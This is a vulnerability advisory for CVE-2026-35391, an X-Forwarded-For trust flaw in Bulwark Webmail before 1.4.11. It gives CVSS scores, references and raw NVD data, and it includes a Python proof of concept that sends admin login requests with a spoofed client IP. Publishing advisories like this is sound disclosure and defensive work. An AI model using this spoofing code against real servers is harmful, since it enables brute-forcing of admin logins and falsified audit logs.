CVE-2026-35391

Description

Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to 1.4.11, the getClientIP() function in lib/admin/session.ts trusted the first (leftmost) entry of the X-Forwarded-For header, which is fully controlled by the client. An attacker could forge their source IP address to bypass IP-based rate limiting (enabling brute-force attacks against the admin login) or forge audit log entries (making malicious activity appear to originate from arbitrary IP addresses). This vulnerability is fixed in 1.4.11.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:* - VULNERABLE

Bulwark Webmail < 1.4.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_poc(target_url, spoofed_ip):
    """
    PoC for CVE-2026-35391: Demonstrates IP spoofing via X-Forwarded-For.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "X-Forwarded-For": spoofed_ip
    }
    
    # Example endpoint: login page or any endpoint that logs IP
    login_endpoint = f"{target_url}/api/login"
    
    data = {
        "username": "admin",
        "password": "test_password"
    }

    try:
        response = requests.post(login_endpoint, headers=headers, data=data)
        print(f"[+] Sent request with spoofed IP: {spoofed_ip}")
        print(f"[+] Response Status Code: {response.status_code}")
        if response.status_code == 200:
            print("[+] Request accepted. Server likely trusted the spoofed IP.")
        else:
            print("[-] Request blocked or failed.")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    fake_ip = "1.1.1.1"
    exploit_poc(target, fake_ip)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35391
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35391
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35391/
[4] VulDB https://vuldb.com/cve/CVE-2026-35391
[5] https://github.com/bulwarkmail/webmail/security/advisories/GHSA-7pj2-232x-6698

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35391", "sourceIdentifier": "[email protected]", "published": "2026-04-06T21:16:20.867", "lastModified": "2026-04-09T20:59:25.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to 1.4.11, the getClientIP() function in lib/admin/session.ts trusted the first (leftmost) entry of the X-Forwarded-For header, which is fully controlled by the client. An attacker could forge their source IP address to bypass IP-based rate limiting (enabling brute-force attacks against the admin login) or forge audit log entries (making malicious activity appear to originate from arbitrary IP addresses). This vulnerability is fixed in 1.4.11."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-348"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.11", "matchCriteriaId": "1011888E-0A3E-46C3-9234-45C7E75C0A31"}]}]}], "references": [{"url": "https://github.com/bulwarkmail/webmail/security/advisories/GHSA-7pj2-232x-6698", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}